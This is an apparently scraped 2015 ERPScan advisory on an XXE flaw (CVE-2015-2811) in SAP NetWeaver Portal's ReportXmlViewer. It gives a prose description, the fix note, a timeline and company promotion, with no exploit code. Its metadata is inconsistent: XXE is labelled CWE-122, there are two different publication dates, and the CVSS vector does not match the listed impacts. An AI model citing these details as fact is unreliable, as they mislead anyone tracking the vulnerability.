ADVISORY INFORMATION\r\nTitle: SAP NetWeaver Portal ReportXmlViewer - XXE\r\nAdvisory ID: [ERPSCAN-15-006]\r\nRisk: High\r\nAdvisory URL: http://erpscan.com/advisories/erpscan-15-006-sap-netweaver-portal-reportxmlviewer-xxe/\r\nDate published: 15.03.2015\r\nVendors contacted: SAP\r\n\r\n\r\n2. VULNERABILITY INFORMATION\r\nClass: XXE [CWE-122]\r\nImpact: XML external entity, information disclosure, denial of service, role upload, thread reporting\r\nRemotely Exploitable: Yes\r\nLocally Exploitable: No\r\nCVE Name: CVE-2015-2811\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\nBy default, the parser opens external entities referenced within an XML input, which can then lead to malicious content being parsed.\r\nThis malicious content can reference internal resources, such as files.\r\nThese internal resources can be disclosed in the response to the request, or can be used to perform a denial of service attack on the parsing system, rendering the application content temporarily unavailable.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\nSAP NetWeaver Portal 7.31\r\nOther versions are probably affected too, but they were not checked.\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\nTo correct this vulnerability, install SAP Security Note 2111939.\r\n\r\n\r\n6. AUTHOR\r\nVahagn Vardanyan (ERPScan)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\nSAP XML parser validates all incoming XML requests with a user-specified DTD.\r\n\r\n\r\n8. REPORT TIMELINE\r\nSent: 09.12.2014\r\nReported: 09.12.2014\r\nVendor response: 10.12.2014\r\nDate of Public Advisory: 18.06.2015\r\n\r\n\r\n9. REFERENCES\r\nhttp://erpscan.com/advisories/erpscan-15-006-sap-netweaver-portal-reportxmlviewer-xxe/\r\n\r\n\r\n10. ABOUT ERPScan Research\r\nThe company\u2019s expertise is based on the research subdivision of ERPScan, which is engaged in vulnerability research and analysis of critical enterprise applications. 
It has achieved multiple acknowledgments from the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!).\r\nERPScan researchers are proud to have exposed new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and to be nominated for the best server-side vulnerability at BlackHat 2013.\r\nERPScan experts have been invited to speak, present, and train at 60+ prime international security conferences in 25+ countries across the continents. These include BlackHat, RSA, HITB, and private SAP trainings in several Fortune 2000 companies.\r\nERPScan researchers lead the project EAS-SEC, which is focused on enterprise application security research and awareness. They have published 3 exhaustive annual award-winning surveys about SAP security.\r\nERPScan experts have been interviewed by leading media resources and featured in specialized info-sec publications worldwide. These include Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, and Chinabyte, to name a few.\r\nWe have highly qualified experts in staff with experience in many different fields of security, from web applications and mobile/embedded to reverse engineering and ICS/SCADA systems, accumulating their experience to conduct the best SAP security research.\r\n\r\n\r\n11. ABOUT ERPScan\r\nERPScan is one of the most respected and credible Business Application Security providers. Founded in 2010, the company operates globally. Named an Emerging vendor in Security by CRN and distinguished by more than 25 other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to improve the security of their latest solutions.\r\nERPScan\u2019s primary mission is to close the gap between technical and business security. 
We provide solutions to secure ERP systems and business-critical applications from both cyber attacks and internal fraud. Our clients are usually large enterprises, Fortune 2000 companies, and managed service providers whose requirements are to actively monitor and manage the security of vast SAP landscapes on a global scale.\r\nOur flagship product is ERPScan Security Monitoring Suite for SAP. This multi award-winning innovative software is the only solution on the market certified by SAP SE covering all tiers of SAP security: vulnerability assessment, source code review, and Segregation of Duties. The largest companies from diverse industries like oil and gas, banking, retail, even nuclear power installations as well as consulting companies have successfully deployed the software. ERPScan Security Monitoring Suite for SAP is specifically designed for enterprises to continuously monitor changes in multiple SAP systems. It generates and analyzes trends in user friendly dashboards, manages risks, tasks, and can export results to external systems. These features enable central management of SAP system security with minimal time and effort.\r\nWe follow the sun and function in two hubs located in the Netherlands and the US to operate local offices and partner network spanning 20+ countries around the globe. This enables monitoring cyber threats in real time and providing agile customer support.\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA, 94301\r\nPhone: 650.798.5255\r\nTwitter: @erpscan\r\nScoop-it: Business Application Security\r\nhttp://erpscan.com\r\n", "edition": 1, "modified": "2015-06-29T00:00:00", "published": "2015-06-29T00:00:00", "id": "SECURITYVULNS:DOC:32257", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:32257", "title": "[ERPSCAN-15-006] SAP NetWeaver Portal ReportXmlViewer - XXE", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}]}